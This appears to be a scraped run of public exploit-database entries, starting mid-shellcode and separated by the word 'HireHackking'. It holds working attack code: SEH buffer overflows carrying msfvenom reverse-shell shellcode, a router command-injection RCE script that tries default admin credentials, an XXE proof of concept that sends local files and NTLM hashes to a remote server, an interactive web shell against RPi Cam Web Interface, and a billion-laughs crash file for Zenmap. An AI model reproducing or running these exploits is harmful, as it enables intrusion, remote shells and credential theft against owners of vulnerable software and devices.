"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")

buffer = "\x41" * 383 + ret + "\x90" * 8 + shellcode
f = open ("iSmartViewPro_1.5.txt", "w")
f.write(buffer)
f.close()
HireHackking 
# Title: LW-N605R 12.20.2.1486 - Remote Code Execution
# Date: 2018-09-09
# Author: Nassim Asrir
# Vendor: LINK-NET
# Product Link: http://linknet-usa.com/main/product_info.php?products_id=35&language=es
# Firmware version: 12.20.2.1486
# CVE: N/A

# Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the 
# HOST field of the ping feature at adm/systools.asp.
# Authentication is needed but the default password of admin for the admin 
# account may be used in some cases.

# Example: 
# [root@parrot]─[/home/sniperpex/Desktop]
# #python ./blue.py -t http://host/ -c ls -u admin -p admin

'''
 _ __        __    _   _  __    ___  ____  ____     _____            _       _ _   
| |\ \      / /   | \ | |/ /_  / _ \| ___||  _ \   | ____|_  ___ __ | | ___ (_) |_ 
| | \ \ /\ / /____|  \| | '_ \| | | |___ \| |_) |  |  _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V  V /_____| |\  | (_) | |_| |___) |  _ <   | |___ >  <| |_) | | (_) | | |_ 
|_____\_/\_/      |_| \_|\___/ \___/|____/|_| \_\  |_____/_/\_\ .__/|_|\___/|_|\__|
                                                              |_|                  
                                                                  @AsrirNassim        
[+] Connection in progress...
[+] Authentication in progress...
[+] Username & Password: OK
[+] Checking for vulnerability...
[!] Command "ls": was executed!

var
usr
tmp
sys
sbin
proc
mnt
media
lib
init
home
etc_ro
etc
dev
bin
'''
import urllib2

import base64

import optparse

import sys

import bs4
 
banner = """
 _ __        __    _   _  __    ___  ____  ____     _____            _       _ _   
| |\ \      / /   | \ | |/ /_  / _ \| ___||  _ \   | ____|_  ___ __ | | ___ (_) |_ 
| | \ \ /\ / /____|  \| | '_ \| | | |___ \| |_) |  |  _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V  V /_____| |\  | (_) | |_| |___) |  _ <   | |___ >  <| |_) | | (_) | | |_ 
|_____\_/\_/      |_| \_|\___/ \___/|____/|_| \_\  |_____/_/\_\ .__/|_|\___/|_|\__|
                                                              |_|                  
                                                                  @AsrirNassim        
"""

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
       
        sys.exit(1)
    else:
        return url+"/goform/sysTools"
 
def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] LW-N605R Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')         
                response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                if "putmsg(mPingCount);" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    if 'e' in  content:
                        print '[!] Command "'+cmd+'": was executed!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                     print '[X] No LW-N605R page found'
                soup = bs4.BeautifulSoup(content, 'html.parser')

		for textarea in soup.find_all('textarea'):
    				print textarea.get_text()
            except urllib2.HTTPError, e:
                if e.code == 401:
                   print '[X] Wrong username or password'
                else:
                   print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        print '[X] Connection Error'
 
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-u', '--user', action="store",
                  help="Insert username",
                  )
commandList.add_option('-p', '--pwd', action="store",
                  help="Insert password",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
 
connectionScan(url,user,pwd,cmd)
HireHackking 
# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86 
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key". Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.

buffer = "A" * (512)
# 0x10030b2d : pop ebx # pop ecx # ret  | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 (
# C:\Program Files\Socusoft\Socusoft 3GP Photo Slideshow\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x2d\x0b\x03\x10"
nops = "\x90" * 18
#Badchar \x00\x0a\x0d
#sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python

buf =  ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"

pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(exploit)
    f.write(exploit)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# Title: Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
# Date: 2018-09-08
# Author: John Page (aka hyp3rlinx)
# Vendor: Microsoft
# Software link: https://www.microsoft.com/en-us/download/details.aspx?id=7558
# Software Version: 2.3
# References: ZDI-CAN-6307
# References: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
# References: hyp3rlinx.altervista.org

# Security Issue
# Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker 
# controlled server if a user opens a specially crafted ".mbsa" file.

# Exploit/POC

# Install MBSA
# https://www.microsoft.com/en-us/download/details.aspx?id=7558

# 1) "evil.mbsa"

<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

# 2) "payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

# When victim attempts open file they get prompted "Do you want to let this app 
# make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft. 
# After opening the local users files can be exfiltrated to a remote server.
# Moreover, we can use this to steal NTLM hashes.

# Using Forced Authentication to steal NTLM hashes

# 2) msf > use auxiliary/server/capture/smb
# msf auxiliary(smb) > exploit -j

"evil.mbsa"

<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [ 
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
%dtd;]>

# Result: credentials captured by remote sever
HireHackking 
# Exploit Title: Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://flash.dvd-photo-slideshow.com/
# Tested Version: 5.20
# Tested on OS: Windows XP Service Pack 3 x86 
 
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Name" + "Code" > Click "Ok"
# You will see a sweet reverse shell poped up in your attacker box.

buffer = "A" * 1328
# 0x1011063f : pop eax # pop esi # ret  | ascii {PAGE_EXECUTE_READ}
# [cximage.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.9.c
# (C:\Program Files\Flash Slideshow Maker Professional\cximage.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x3f\x06\x11\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
buf =  ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"

pad ="C" * (2300 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(exploit)
    f.write(exploit)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# Exploit Title: Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:hhttp://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86 
 
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key". 
# Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.

buffer = "A" * 502
buffer += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x30"

# 0x10015a62 : pop esi # pop edi # ret  | ascii {PAGE_EXECUTE_READ}
# [DVDPhotoData.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0
# (C:\Program Files\Socusoft\Socusoft Photo To Video Converter Professional\DVDPhotoData.dll)

nseh = "\xeb\x06\x90\x90"
seh = "\x62\x5a\x01\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 
# LPORT=1337 -b '\x00\x0a\x0d' -f python

buf =  ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"

pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(exploit)
    f.write(exploit)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
#!/usr/bin/python

import sys
import requests
import os
import re
import readline

def usage():

	print "\nRPi Cam Web Interface Exploit\n"
	print "Usage: %s http://host/path/to/preview.php \n" % sys.argv[0]
	print "Options: "
	print "  -h, --help              Show this help message and exit"
	print ""
	sys.exit(0)

def execute_command(url, cmd):
	
	split = "---a97a13f9f48c65c72e4802fc1e516e3f---"
	convert = ".) >/dev/null 2>&1; (" + cmd + ") 2>&1; echo " + split + ";#aaaaaaa"
	convertCmd = "/usr/bin/ffmpeg -f image2 -i i_%05d.jpg"
	data = {"convert":convert,"convertCmd":convertCmd}
	headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"}

	try:
		r = requests.post(url, headers=headers, data=data, verify=False)
		if r.status_code == 200:
			if len(r.content) > 0 and split in r.content:
				return r.content.split(split)[0]
			else:
				return ""
		else:
			print "\n[*] Error: Received HTTP Status " + str(r.status_code) + "\n"
			return ""	
	except requests.ConnectionError as e:
		print "\n[*] Error: An error occurred while connecting to the host.\n"
		exit(1)
	except requests.exceptions.RequestException as e:
		print "\n[*] Error: Something unexpected happened.\n"
		print e
		exit(1)

def main():

	if len(sys.argv) < 2 or sys.argv[1] in ("-h", "--help"):
		usage()

	url = sys.argv[1]

	print "\nRPi Cam Web Interface Exploit"

	print "\n[*] Attempting exploit on:"
	print "    " + url

	username = execute_command(url,"whoami").strip()
	if len(username) == 0:
		exit(1)
        
	hostname = execute_command(url, "hostname").strip()

	path = execute_command(url, "pwd").strip()

	print "\n[*] Returning prompt!\n"

	try:
		while True:
			prompt = username + "@" + hostname + ":" + path + "$ " 
			cmd = raw_input(prompt)
			if cmd == "exit":
				print "\n[*] Goodbye!\n"
				return
                        elif cmd.startswith("cd "):
                                chars = set(";&|")
				if any((c in chars) for c in cmd):
					print "[*] This shell only supports cd as a standalone command."
				else:
					cmd = cmd.split()
					tmpPath = " ".join(cmd[1:])
					if tmpPath == "..":
						if len(path.split("/")) > 2:
							tmpPath = "/".join(path.split("/")[:-1])
						else:
							tmpPath = "/"
					cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
					tmpPath = execute_command(url,cmd).strip()
					if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
						path = tmpPath
					else:
						print tmpPath.split('\n')[0]
			elif cmd == "clear":
				os.system("clear")
			else:
				cmd = "cd " + path + " && " + cmd
				results = execute_command(url, cmd)
				if len(results) != 0:
					print results

	except KeyboardInterrupt:
		print "\n\n[*] Goodbye!\n"
		return

if __name__ == "__main__":
	main()
HireHackking 
# Exploit Title: Nmap 7.70 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-10
# Software Link: https://nmap.org/dist/nmap-7.70-setup.exe
# Tested Version: 7.70 (ZenMap)
# Tested on OS: Windows 7 32bit

# Description: This vunerability causes the program to crash and start to heavily consume 
# system resources. Do not test on critical systems, can cause system crash.

# Steps to reproduce:
# 1. Create a file in Notepad with the following and save it as "test.xml":

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
<!ENTITY lol11 "&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
<!ENTITY lol12 "&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
<!ENTITY lol13 "&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
<!ENTITY lol14 "&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
<!ENTITY lol15 "&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
<!ENTITY lol16 "&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;">
<!ENTITY lol17 "&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;">
<!ENTITY lol18 "&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;">
<!ENTITY lol19 "&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;">
<!ENTITY lol20 "&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;">
<!ENTITY lol21 "&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;">
<!ENTITY lol22 "&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;">
<!ENTITY lol23 "&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;">
<!ENTITY lol24 "&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;">
<!ENTITY lol25 "&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;">
<!ENTITY lol26 "&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;">
<!ENTITY lol27 "&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;">
<!ENTITY lol28 "&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;">
<!ENTITY lol29 "&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;">
<!ENTITY lol30 "&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;">
]>
<lolz>&lol30;</lolz>

# 2. Open Zenmap > Scan > Open Scan > "test.xml"
# 3. Crash
HireHackking 
# Exploit Title: Any Sound Recorder 2.93 - Denial of Service (PoC)
# Date: 2018-09-09
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.any-sound-recorder.com
# Software: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: Any Sound Recorder 2.93 
# Tested on: Windows 7 SP1 x86

#!/usr/bin/python 

import struct
print"""

#1.  Download and install the setup file
#2.  A file "Byte.txt" will be created
#3.  Click Help > Enter key code... in tool bar
#4.  Copy the contents of the file (Byte.txt) and paste in the Username Name field 
#5.  Click Register and BOOMMMM !!!! 

totalsize = 7000 # total size buff
buffer= "\x41" * 900  #Offset
nseh= "BBBB" # next seh address 
seh= "CCCC"  # seh address
shellcode= "T" * (totalsize-len(buffer+nseh+seh))
payload = buffer + nseh + seh + shellcode
try:
    f=open("Byte.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"